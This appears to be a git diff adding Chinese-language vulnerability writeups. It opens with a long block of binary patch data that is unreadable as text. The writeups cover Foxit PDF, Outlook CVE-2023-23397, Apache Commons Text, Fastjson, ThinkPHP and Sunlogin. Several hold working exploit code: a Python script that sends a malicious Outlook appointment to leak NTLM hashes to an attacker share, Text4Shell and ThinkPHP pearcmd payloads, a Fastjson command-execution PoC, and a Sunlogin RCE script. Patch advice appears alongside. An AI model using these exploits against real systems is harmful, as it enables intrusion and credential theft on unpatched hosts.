zI^!_-=>;x8HM^2yd(O2#*>J+uzRG|6Qw-g=w2emIkimi{k0&2EpM4LNDlzih7O?!<>*y zhY3ATCl7sm@}G0p>Wo{0crg|*>4|azVm`l~w8$!$`sM${rvXI+?7h)XP-NeEleNO@ z3Rj=xeSSPnum2n+kF9!*34C_imdVCuZMdiGcJ+L{L}5=YiZHGla(4ow-?zLBTzWS* zBE9PMiW< zpl*vCsJ~hofEykE()NYqp19Sohq1t3VZ)Y?;PMDd*`#U2*j>0{@uLX7DvVF#PzVdG zlcJBoE1&&U8$HyS^qM}x+#%V>q2{rZ03O9nq!MN|u+kVTeXi;>fgb(vVQc-Dk=ViI ziP(stBy1VC@_#LXhwx^>H5Rq!g=WyvJ;yO%i+i{vI9z-{v|~pzVN|)&W7Wo)nNnn7 zGBH-lFCSdyxZdWb8>roX=p|N)EGS?_Zggj%sCe|Q^_?iVVC_>DBHze zY=TF=J;NBn=$o2N{G@Qz$#i8OVboS}@AbKu3_^2r`0d8>eqkXvX<-L$9m^yPxZ*g% z^swnZ*T4b3{}0-Lxf2$)Sr31$nYcy{NE2B4sWG@>R~+VSKb}RYIb=wXVhou<=R~rV*2-vL1cQ4?4r%vS?ssLFQY?x_nGmKvY`RCkY?{((h~ddVPdwTbXwplB?%?HY0V)q zR`WE%vOi4J%a~i@!sg6jl@`VKSQTP0vpGIDMq^x;oM8OB2KJTwLomTUwos%x?Yzx< zZk&-Jqkt8mAF-roqm>aJSR$a*CY2n*`7?bH;%6D6`?1dOYQ{I+AJc^lL-x)cbFz|P+0h_7PFfX{qhS!=+y3S1 zPujHmrn{2QUXQCcN>ut;``pU+<;lLR9-WpCdr6yr{=+df<<;+T2{iAYkzS~+(N;-0 zE^Vh;uVYxG@4s(tG5YIy2-(b0)Y`#e+xB_C`$|f3nD9 zre9nsOt+Vg;AcXc{L{%YnrKGP@hG;EbAWx45HdGiX`t#F-&vx)uK^a?Q&X)ZiYF3= z+puOuZ}C?nHFk0`!bWZP@m!3Ia$)deM^Dm6NznY63U0obOH2qT#riG_nEgW45?(Od z?5!UFTA!oxa}q1Me?gM8L7YNNnl>+DYT7MaVmQ;Ea#NBNZGX_k$kQ*RW~G0Ap7I6O z{nowxgH$&optqt-Qg`;FOWpS(SLRjeCo+K%&{`Lkt|pnwVNlYGr=J*JG3&^H+$jGT z&u@GI6=FCAr5L|)Wf*QDi}LlJF4^04QSTndISwl1$tE*{l^c=A=)*o?$F}q(naNj3fWEzS(Ot^G@&dVyGn?gn=33NQc5TULCd)YyGr-j z2ie?n3B{_PCo~3%$UOdCX?m1-`DkQTyeEODXgU0C?6b<645wv5D88<{V6G5?XGn6l zr3Ww14;#1=Iv+#lw%KgBk=L zgD;Zn7Wz(@3$KgcsM1!J+;gFuN~E3h=W-z`BR9(9h*%G-Y(hz2{2@2;!T{w=b(Omz ze)6%uhtR$GodHg4of<3%OQNh~Ul2Bus(%J3%~f#oa>}Dek8(IfBG~cW7@IF1JZ{jl z$gq?hhToQ@ENWc|8C2gwSUgj`9G`?&cU_!|E$HR-TNTJ$S&ddf1>*VoPKwv}#e+fZ z;vf0Ee*Vy;lO5Ti#5fuDCYM_EiOg~a^HJ!TQNgk1RgBbO;PYcoWYh6h&8aZ#*BdNY zXCZCKZ-6mtDz+c`C=U({@+y2y#N4(FHN>@f3L;uc$Egf97q72tUHKZlCNQvPHuEFdg$ zSBk4O0RHx zU>Wwpj_qJWtjHpg>Y`96n|yBU&}FsDb3SMAb>r=^JorzqnOF&JVerV2;H59;9GJd& z{+7OyPw$QE#^dwBa^2OW)9m6WY6^7i_QbQtFkJn~Cns;sWyZ(PMd!<=kipYrg%HtQ z*i!#cl5AyVbMC<_Md4Q)$%-;QUU;;-c2Gj-qAWMjlsL+KX6W3g!$MJio%WN+3-BV0 zgrQuLQMxkkugceHHV^G9N(|$u(;^lNlrxSkRdrTNJS!H2hs&mVCG{E>EE!jfEfZ%m z4GW}8^(B&OUHumsW!T+t7jH*mL#M_jedeUw$YiW+jzo~CCS~-P2D~d$!ZIgb&Va1o z{J$9uzgqG%qR?-{jdWET1r#=|oqwU;mwdJsQCGMQAZZkzDZq|&(W78e_^bC%! zqz~VPWLc9L7^eCC^vla+o^IVAB`;+4Fta+k{>idydy|)+a4IU`i|(q*jqsw-YJ9ws zroK5RY7mmD$@G^^M1uS&(K4i1^`Pb;FOkc}EzL;M>qWU41Ia`}Q$^M>seP@07cRL2 zPr?L;W2(L4Y{n#_zT9iSDYU#>YSL4+sQ6YzU5l}NCpvLvfMyQ&NW0yX?is;(ZP<9e zXtcFYYmnDn&a5oNv(3a+Vh_%$&NYHSN!sL&M;(tYfqmWigQAw%KOoJR@T=^^#Z-Gr z*x1Tu&wzdh$$^%p^CSnd=nqh zlNrCDRIC_}&sG0Om>r-hst+AFw%Cd6ye2+^VfRm*1|KAu1!EgYWsKbGkr9CsK_8+7A4`OI=^34X-7Iba*o>qqY}NK zZ|d`3_yvcMk$qrCR@I;(_!gZCyFJi0EOnb=hF_E6BVt;bRMWXjE3XAQTh8zpLUkVZ z_T+RAM_aMun>~;Eq=D6O1`k963~IpF=xE_B$)vg7pFO&Z+I7>#*ixaoVL(L2rpL-I zd(^q%UmxZ45!#<=MSJ{8;592()Q@~~M-q*Mz(t?zdE^ER zKj#(g<@lLv>`jkUP_Xn`WMZx2q<2d+18gdvj5SZdixw=|rXE?z58AIFIn6!ng7&Z@%jfsYi)t+Z42y2P&-c2 zbw*FdX8mDYynP`m?S=}xc}Y|bn;mAFezuAIkP?}`+u?19poMZUIW^I#m_J>@*BN2s zuP<6fPKVq&IMGZah(ACHv%3c-ITh`6iD9E?x!vR>jMpKBjOcf7-hIbgXsvF@2=@DR z%V0pAU%JuX%kNJ9m}Y>z5a;aF#rEf0&SeR<-t){@=@$DM+YNwdlRHWIBq#~#od`LX z{p}viLK0)@^B~w~FoQnrhd3;L5Ppn%Q8-(VR~4oCcRqeHw&)(-elK`%#Vfa6isx9z zeI>e%zcKT3o9Vc}L&I$Oo@YG2a&CX%jgzmS!jlYW-9)v0rMZ8SvhpIN*?ch(AAASr zH=-P*trjw3tjl+SnYwf*ekE2)H@WV9zE^1ADJ|1T$MdRQKza%#PL@6)3Vy^B6c^$7 zxX+SK?W9ItME8mn<%-!~Zqv!w!CT*1%(VoUL~9#khMaApfZj4XfhLnyWxJ@%>cInC zTy>y3bW@JV@+j6k_`3Iu`e&BkW|Bd;qF5N z3PXPuai7WNz6v0cYWx0x&YrYbhmZjzPcuC^3LEOzIf-}u3B!IErd&dsS0D%*c{2#y z7JYh<+spyH{@QAAj6ZH}o}I80sH=o+u4N%d>IAu6LD*X>vzypGPu-fF294t&#^ML= z`*MXI0TQ-!*x9K(of=d<22rEC)jU=bjP2U;qci=BzP|dT>B`*#alB%ec?P(*ylmLt z(8Z*pnKl2enC(9iogwRp<{7UTrqzo~HQCSIW?HhV?}6>uLM2tKQHbvBMUK?fRojP4 z;}0BG3!k{ZT+Lw+dOUfh(v*ENK2<&9NV?k$&HFm{$`@2n3C!%$e7X(&V#!9x; zPjt5)_LY*5JWy{)EVPf^S`{bji?mS-A@$4H~h;MP-dg>$Uf@JauDVy*J!yUK$_zrefLOV-xuft~M- z4HT2YztCi**UjJ_e8Hklmbw=1cGvwU%EAMplu^TGX=-frcNxcc?_2yzg!t=IliSoI{QbuH?_NUKu7ujV`MiwFp&9ivwd~7< zV^=vEG~4_xm+n3$D@N zxD@-C!9_SRF3wG?A`7YJn*5^RR}nG|RPXFcZh?&a(pa+46ehFfFl2e>qhj6XX^D`L zK234kA=Y5AtkGwH5Efo-YViQ4czERlhS|0KhLqjA04qHfi5>9trDM8uDa(s@jg|B( zXJVdE)U~wwByD5^wrp;PD^OG|7fISA@6H@=bTneKQHsUkpI*efEr`msUd)&3&McRB z#_=n?=dzcxdzgPgCQRK2|9H1a)<_r`ES_OZv=~#>vSlH5xn6{9j*Ufvb3)imSUA7u&{Sm+uJfh#uI<%hrc6OchWR$^c!zS^qMhcBOiSV=z-h^p20a3eErgR zvAUK+;FRrwt^j?PZ|-={cB`J0f}hGJr_^aDVJA;K zaay7ly`I5ZfIz@|qj$+KETSKv=HxuPyTYJ9hR$fky$6kry)IdBH(d3az+H$I6<>L zEl{BB;d%^@Ffchx8Zd{l zzTcLxcD?=T*fu^$oA%>S`8?QoAtol0pSC?t2k|?goeGAMNGjUiC^=Bwl#;-RwQ85+ z(awoP-RurKYmyw|eb*_^s|~nlg@Bh^`TJx-Z_wA1ZuYPcdT_MWI`dkPWT>|`9AUH3 zIU0^a=#dkS%jc>ENrIN^I_jD0t@nS*K0EO|v4glv&PwMFh&EMH>hY1ko}6Lin@9w+ zhRmm-Y}bX$xr0bc?6|a!RsWsu=tCw8Zfx|>>6U40gO<~vmq1MDaLiv9hZdwBGA`${ zS7*uw$1eIH+w#aL1WI0v-eh&-M16*elQTuJ^{~U6^;D1+hdQ^rr^zI5(z?Lq*f~-Y z^W=h?(?#rXv;u}^joWv8(dG93WG+ljc^Y?u^n0)ER{7VfLg8rOny^90SB6P`7y)u| zU6A&4eE9IEJW*sTG@A&|??Sbo7kd5E`G{>AC>)RwRQpdVHW-WyrFLxyT6=-bD=N*A z+$PTwJOyGgshufaoxR``wAKaqCHomfPdj_3oR>h@Q1OnL7gw*12af#v^F_>Sx<8{DgE4631PhtW>_rdJ*zdOtI8qum^$Ff`uH2)oI$cKuCHJbf*o zW%Hx!n-oGCO)|Ryyyn3rD}}Wsj1W;T&HaBD9JF2nz)_IXw^1Bzp&xz%(iEYiyH%qx@^Lj{lOf2y<0*xS16Tz7R zvY1;QQRKt2MmfPrCmjBBN9C+H_R6J{xVO3AA;cDJV%HhhnEk8z_F>iMITYGn&2mQRX%UqliRvNn)RhqWkTFzlp>S6XR6B zS3GSnw#r~@)Ha1X-Y6fGk9YP7Bq}DAcv|3Lf&jlDP*$cxUX&}}qZO*=e48JCK=t)O ztOvUqb~NpN`0uzT9d-wRq^9TSj+P>Racl1XH7x!fN+;>Rv?PP`!WM-)XKdOAGhe~O z^v;x^^%*t>tW7!Ku(KzZtq%Ck9`lO_|atdsz~K$ zcR3=wd&5+;T+MfxsQ4);h=BkA-*5h_u9V(9GB`R@lV^t4uRJU zXhx-W`Q7XEi~|x8-nbMy47h4tzQU2-DJWb@dJZw+ncN0=W+%VC;rIkx8@k#~8D=NYb6tLxTh#(!IP~DiOLCRo8JD87d%cE);>A8@N}F6sRqaHy zb?}L+z{Wqs=0Qk-){OUWw}YSw(2OFW?nP;*kz}eo=_@VKT)DSqtGv5`L=*x}%Kmqj z5Mcka!54mGhY{s;MPV+M`t+qMf$mJ{lWMmmyIs6Wb8rXiFnDbJzF&C3h|j!yo3 zNNy_95+Oi>1zPg%J*jEP{qaos)4phw6-Jv%1QyitpS0CIxd=TZLT^4JdR*IlbApxd82W1mJTEkb8>QQ zowA`IYHO_p*xA@joju^qy&#|D@k||3b|R2|#|D|A;~%(aEOS}3`Yin1g|h{xum16W D_Ezs! literal 0 HcmV?d00001 diff --git a/其他漏洞/Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363.md b/其他漏洞/Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363.md new file mode 100644 index 0000000..b4364c6 --- /dev/null +++ b/其他漏洞/Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363.md @@ -0,0 +1,27 @@ +# Foxit PDF Reader 及 Editor 任意代码执行漏洞 CVE-2023-27363 + +## 漏洞描述 + +Foxit PDF Reader 及 Editor 中存在任意代码执行漏洞,由于 Foxit PDFReader/Editor 未验证 exportXFAData 方法中的 cPath 参数,使得恶意的.hta 文件写入 Startup 目录中,攻击者可通过诱导受害者打开特制的 PDF 文档触发此漏洞,系统重启后将执行攻击者的恶意代码。 + +## 漏洞影响 + +``` +Foxit PDF Reader <= 12.1.1.15289 +Foxit PDF Editor 12.x <= 12.1.1.15289 +Foxit PDF Editor 11.x <= 11.2.5.53785 +Foxit PDF Editor <= 10.1.11.37866 +``` + +## 漏洞复现 + +poc: + +https://github.com/j00sean/SecBugs/tree/main/CVEs/CVE-2023-27363 + +## 漏洞修复 + +目前官方已发布可更新版本,受影响用户可通过以下任一步骤进行更新: + +1. 在 Foxit PDF 阅读器或 Foxit PDF 编辑器中,点击“帮助”>“关于 Foxit PDF阅读器”或“关于 Foxit PDF 编辑器”>“检查更新”(对于 10 版本或更早的版本,点击“帮助”>“检查更新”)以更新到最新版本。 +2. 手动下载更新:https://www.foxit.com/downloads/ \ No newline at end of file diff --git a/其他漏洞/Microsoft Outlook 权限提升漏洞 CVE-2023-23397.md b/其他漏洞/Microsoft Outlook 权限提升漏洞 CVE-2023-23397.md new file mode 100644 index 0000000..66a66ec --- /dev/null +++ b/其他漏洞/Microsoft Outlook 权限提升漏洞 CVE-2023-23397.md @@ -0,0 +1,119 @@ +# Microsoft Outlook 权限提升漏洞 CVE-2023-23397 + +## 漏洞描述 + +该漏洞存在于 Microsoft Outlook 中,是一个身份验证绕过漏洞。未经身份验证的远程攻击者仅通过向受影响的系统发送特制电子邮件,从而访问用户的Net-NTLMv2 哈希,进而可以在中继攻击中使用此哈希来冒充用户,从而有效地绕过身份验证。 + +## 漏洞影响 + +``` +Microsoft Outlook 2016 (64-bit edition) +Microsoft Outlook 2013 Service Pack 1 (32-bit editions) +Microsoft Outlook 2013 RT Service Pack 1 +Microsoft Outlook 2013 Service Pack 1 (64-bit editions) +Microsoft Office 2019 for 32-bit editions +Microsoft 365 Apps for Enterprise for 32-bit Systems +Microsoft Office 2019 for 64-bit editions +Microsoft 365 Apps for Enterprise for 64-bit Systems +Microsoft Office LTSC 2021 for 64-bit editions +Microsoft Outlook 2016 (32-bit edition) +Microsoft Office LTSC 2021 for 32-bit editions +``` + +## 漏洞复现 + +exp: + +``` +python CVE-2023-23397.py --path '\\your-ip\' +``` + +``` +import smtplib, datetime, argparse +from email.mime.multipart import MIMEMultipart +from email.mime.text import MIMEText +from email.mime.application import MIMEApplication +from email.utils import COMMASPACE, formatdate +from independentsoft.msg import Message + +## Mail configuration : change it ! +smtp_server = "mail.example.com" +smtp_port = 587 + +sender_email = "attacker@mail.example.com" +sender_password = "P@ssw0rd" + +recipients_email = ["victim@mail.example.com"] + +class Email: + def __init__(self, smtp_server, port, username, password, recipient): + self.smtp_server = smtp_server + self.port = port + self.username = username + self.password = password + self.recipient = recipient + + def send(self, subject, body, attachment_path): + msg = MIMEMultipart() + msg['From'] = self.username + msg['To'] = COMMASPACE.join(self.recipient) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + + msg.attach(MIMEText(body)) + + with open(attachment_path, 'rb') as f: + part = MIMEApplication(f.read(), Name=attachment_path) + part['Content-Disposition'] = f'attachment; filename="{attachment_path}"' + msg.attach(part) + + try: + server = smtplib.SMTP(self.smtp_server, self.port) + server.starttls() + server.login(self.username, self.password) + server.sendmail(self.username, self.recipient, msg.as_string()) + server.quit() + print("[+] Malicious appointment sent !") + + + except Exception as e: + print("[-] Error with SMTP server...", e) + +parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.') +parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True) +args = parser.parse_args() + +appointment = Message() +appointment.message_class = "IPM.Appointment" +appointment.subject = "CVE-2023-23397" +appointment.body = "New meeting now !" +appointment.location = "Paris" +appointment.appointment_start_time = datetime.datetime.now() +appointment.appointment_end_time = datetime.datetime.now() +appointment.reminder_override_default = True +appointment.reminder_sound_file = args.path +appointment.save("appointment.msg") + +email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email) + +subject = "Hello There !" +body = "Important appointment !" +email.send(subject, body, "appointment.msg") +``` + +## 漏洞修复 + +目前微软官方已针对受支持的产品版本发布了修复该漏洞的安全补丁,建议受影响用户开启系统自动更新安装补丁进行防护。 + +注:由于网络问题、计算机环境问题等原因,Windows Update 的补丁更新可能出现失败。用户在安装补丁后,应及时检查补丁是否成功更新。右键点击Windows 徽标,选择“设置(N)”,选择“更新和安全”-“Windows 更新”,查看该页面上的他提示信息,也可点击“查看更新历史记录”查看历史更新情况。 + +针对未成功安装更新补丁的情况,可直接下载离线安装包进行更新,链接如下: +https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-23397 + +临时防护措施: + +若用户无法正常进行补丁修复,在不影响正常业务的情况下,可使用以下措施对漏洞进行防护: + +1. 将用户添加到受保护的用户安全组,以防止使用 NTLM 作为身份验证机制。注意:该操作可能会对需要 NTLM 的应用程序造成一定影响。详情请参考: + https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group +2. 用户可通过在网络中同时使用外围防火墙和本地防火墙,并通过 VPN 设置来阻止 TCP 445/SMB 从网络出站。注意:该操作将禁止发送 NTLM 身份验证消息到远程文件共享。 \ No newline at end of file diff --git a/开发框架漏洞/Apache Commons Text 远程代码执行漏洞 CVE-2022-42889.md b/开发框架漏洞/Apache Commons Text 远程代码执行漏洞 CVE-2022-42889.md new file mode 100644 index 0000000..8ffbe55 --- /dev/null +++ b/开发框架漏洞/Apache Commons Text 远程代码执行漏洞 CVE-2022-42889.md @@ -0,0 +1,72 @@ +# Apache Commons Text 远程代码执行漏洞 CVE-2022-42889 + +## 漏洞描述 + +Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞(CVE-2022-42889)。Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。 + +## 漏洞影响 + +``` +1.5.0 ≤ Apache Commons Text < 1.10.0 +``` + +## 环境搭建 + +IDEA 通过 Maven 导入依赖,pox.xml 如下: + +``` + + + org.apache.commons + commons-configuration2 + 2.7 + + + org.apache.commons + commons-text + 1.9 + + + org.apache.commons + commons-lang3 + 3.12.0 + + +``` + +测试代码: + +``` +package org.text; + +import org.apache.commons.text.StringSubstitutor; + +public class Main { + public static void main(String[] args) { + StringSubstitutor interpolator = StringSubstitutor.createInterpolator(); + // String payload = interpolator.replace("${script:js:new + // java.lang.ProcessBuilder(\"calc\").start()}"); + String payload = "${script:js:new java.lang.ProcessBuilder(\"calc\").start()}"; + interpolator.replace(payload); + } +} +``` + +## 漏洞复现 + +Payload: + +``` +search=${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} + +url编码 +search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D + +可以尝试 +search=${url:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} +search=${dns:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')} +``` + +## 修复建议 + +官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。 \ No newline at end of file diff --git a/开发框架漏洞/Fastjson 远程代码执行漏洞 CVE-2022-25845.md b/开发框架漏洞/Fastjson 远程代码执行漏洞 CVE-2022-25845.md new file mode 100644 index 0000000..8809c5e --- /dev/null +++ b/开发框架漏洞/Fastjson 远程代码执行漏洞 CVE-2022-25845.md @@ -0,0 +1,57 @@ +# Fastjson 远程代码执行漏洞 CVE-2022-25845 + +## 漏洞描述 + +Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列 化到 JavaBean。在 Fastjson 1.2.80 及以下版本中存在反序列化漏洞,攻击者可 以在特定依赖下利用此漏洞绕过默认 autoType 关闭限制,从而反序列化有安全风险的类。 + +## 漏洞影响 + +``` +Fastjson ≤ 1.2.80 +``` + +## 漏洞复现 + +利用 idea 创建 maven 项目 搭建漏洞环境,在 pom 文件中添加 + +``` + + com.alibaba + fastjson + 1.2.82 + +``` + +创建文件夹 com.example.fastjson,在下面添加两个 java 文件 + +``` +package com.example.fastjson; + +import java.io.IOException; + +public class Poc extends Exception { + public void setName(String str) { + try { + Runtime.getRuntime().exec(str); + } catch (IOException e) { + e.printStackTrace(); + } + } +} +package com.example.fastjson; +import com.alibaba.fastjson.JSON; + +public class PocDemo { + public static void main(String[] args) { + String json = "{\"@type\":\"java.lang.Exception\",\"@type\":\"com.example.fastjson.Poc\",\"name\":\"calc\"}"; + JSON.parse(json); + } +} +``` + +运行 PocDemo + +## 漏洞修复 + +1. 升级至版本 FastJson 1.2.83:https://github.com/alibaba/fastjson/releases/tag/1.2.83 +2. 升级到 FastJosn v2:https://github.com/alibaba/fastjson2/releases \ No newline at end of file diff --git a/开发框架漏洞/ThinkPHP 命令执行漏洞 CNVD-2022-86535.md b/开发框架漏洞/ThinkPHP 命令执行漏洞 CNVD-2022-86535.md new file mode 100644 index 0000000..ea917b3 --- /dev/null +++ b/开发框架漏洞/ThinkPHP 命令执行漏洞 CNVD-2022-86535.md @@ -0,0 +1,29 @@ +# ThinkPHP 命令执行漏洞 CNVD-2022-86535 + +## 漏洞描述 + +该漏洞是由于 Thinkphp 开启了多语言功能,并且对参数 lang 传参过滤不严谨,导致攻击者可利用该漏洞执行命令。 + +## 漏洞影响 + +``` +ThinkPHP >=V6.0.1,<=V6.0.13 +ThinkPHP >=V5.0.X,<=V5.1.X +``` + +## 漏洞复现 + +payload: + +``` +/index?lang=…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&+config-create+/&/+/var/www/html/test.php +``` + +## 漏洞修复 + +官方已发布漏洞补丁及修复版本,可以评估业务是否受影响后,酌情升级至安全版本。 + +如不需要多语言功能,请及时关闭此功能,可参考官方文档: + +- https://www.kancloud.cn/manual/thinkphp6_0/1037637 +- https://static.kancloud.cn/manual/thinkphp5/118132 \ No newline at end of file diff --git a/服务器应用漏洞/向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md b/服务器应用漏洞/向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md index dd53741..a6949f1 100644 --- a/服务器应用漏洞/向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md +++ b/服务器应用漏洞/向日葵 check 远程命令执行漏洞 CNVD-2022-10270.md @@ -36,4 +36,49 @@ body="Verification failure" /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig ``` -![](./images/202205241354108.png) \ No newline at end of file +![](./images/202205241354108.png) + +## 漏洞修复 + +1. 输入检查:应用程序必须实现输入检查机制,将所有从外部接收的数据都进行严格的检查和过滤,防止恶意代码被注入。 +2. 参数化查询:采用参数化查询可以防止攻击者通过利用应用程序的注入漏洞来修改查询语句,实现任意代码执行的攻击。 +3. 输出编码:在输出时对敏感字符进行编码保护,比如 HTML 编码,防止恶意代码直接输出执行。 +4. 使用最新的安全防护措施:保证服务器系统和应用程序的所有组件、库和插件都是最 新的,确保已知的漏洞都得到修复。 +5. 强制访问控制:应该设置访问控制机制,确保恶意用户无法访问敏感数据和代码。 + +## 漏洞POC + +exp: + +``` +import requests,sys + +ip = sys.argv[1] +command = sys.argv[2] +payload1 = "/cgi-bin/rpc?action=verify-haras" +payload2 = "/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+" +headers = { + 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0' +} + +if "http://" not in ip: + host = "http://" + ip +else: + host = ip + +try: + s = requests.Session() + res = s.get(url=host + payload1,headers=headers) + if res.status_code == 200: + res = res.json() + Cid = res['verify_string'] + headers.update({'Cookie':"CID=" + Cid}) + res1 = s.get(url=host + payload2 + command,headers=headers) + res1.encoding = "GBK" + print(res1.text) + else: + pass +except Exception as e: + print(e) +``` +